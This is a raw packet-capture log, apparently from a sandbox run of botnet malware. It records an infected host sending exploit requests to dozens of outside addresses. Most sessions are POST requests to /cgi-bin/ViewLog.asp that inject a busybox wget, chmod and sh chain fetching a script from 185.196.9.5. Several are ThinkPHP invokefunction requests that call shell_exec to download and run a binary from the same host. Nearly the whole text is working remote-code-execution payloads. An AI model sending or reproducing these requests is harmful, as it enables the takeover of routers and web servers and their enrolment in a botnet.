Feb 25, 2024 19:05:29.019397020 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:29.238075018 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Sun, 25 Feb 2024 18:05:29 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1187	192.168.2.15	45236	95.86.104.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:29.039719105 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1188	192.168.2.15	40670	94.122.108.230	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:29.039832115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1189	192.168.2.15	37944	94.122.229.171	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:29.043931007 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1190	192.168.2.15	50398	94.120.101.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:29.047456026 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1191	192.168.2.15	55660	95.211.139.236	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.011148930 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:30.193339109 CET	469	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:30 GMT Content-Type: text/html Content-Length: 150 Connection: close Access-Control-Allow-Origin: * Timing-Allow-Origin: * X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1192	192.168.2.15	41394	95.165.195.46	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.036303043 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:30.259855032 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:05:20 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1193	192.168.2.15	35322	95.56.92.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.082288980 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:30.350038052 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:05:30.350117922 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
1194	192.168.2.15	60244	95.131.158.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.116601944 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:30.419624090 CET	200	IN	HTTP/1.1 400 Bad Request Content-Type: text/html;charset=iso-8859-1 Content-Length: 69 Connection: close Server: CloudianS3 Data Raw: 3c 68 31 3e 42 61 64 20 4d 65 73 73 61 67 65 20 34 30 30 3c 2f 68 31 3e 3c 70 72 65 3e 72 65 61 73 6f 6e 3a 20 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 48 54 41 42 3d 30 78 39 3c 2f 70 72 65 3e Data Ascii: <h1>Bad Message 400</h1><pre>reason: Illegal character HTAB=0x9</pre>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1195	192.168.2.15	46576	95.164.60.228	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.130907059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:30.249286890 CET	750	IN	HTTP/1.1 400 Bad Request Server: ngjit Date: Sun, 25 Feb 2024 18:05:30 GMT Connection: close Content-Type: text/html; charset=utf8 Content-Length: 579 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 20 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 20 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 70 3e 3c 62 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 20 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 53 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 69 6e 76 61 6c 69 64 20 73 79 6e 74 61 78 2e 20 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e Data Ascii: <!DOCTYPE html><html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 400</title><style>*{margin:0;padding:0}html{font:15px/22px arial,sans-serif;background: #fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}p{margin:11px 0 22px;overflow :hidden}ins{color:#777;text-decoration :none;}</style><p><b>400 - Bad Request .</b> <ins>Thats an error.</ins><p>Server could not understand the request due to invalid syntax. <ins>Thats all we know.</ins>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1196	192.168.2.15	36064	95.101.215.60	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.272795916 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:30.542016029 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:30 GMT Date: Sun, 25 Feb 2024 18:05:30 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 33 30 26 23 34 36 3b 33 63 32 33 66 61 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.160b1502.1708884330.3c23fab</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1197	192.168.2.15	60220	95.38.224.209	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:30.347112894 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1198	192.168.2.15	33200	94.120.209.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.544418097 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1199	192.168.2.15	37412	94.121.108.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.544462919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1200	192.168.2.15	54714	94.123.109.192	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.544500113 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1201	192.168.2.15	43028	31.200.84.250	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.544538021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1202	192.168.2.15	51718	95.86.68.95	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.544567108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1203	192.168.2.15	58430	94.120.50.125	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.544610023 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1204	192.168.2.15	45008	94.140.0.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.676153898 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1205	192.168.2.15	59192	62.29.54.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.773545027 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1206	192.168.2.15	49832	62.29.100.185	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.773660898 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1207	192.168.2.15	51058	94.123.46.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.779238939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1208	192.168.2.15	44220	85.26.215.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:31.938899040 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
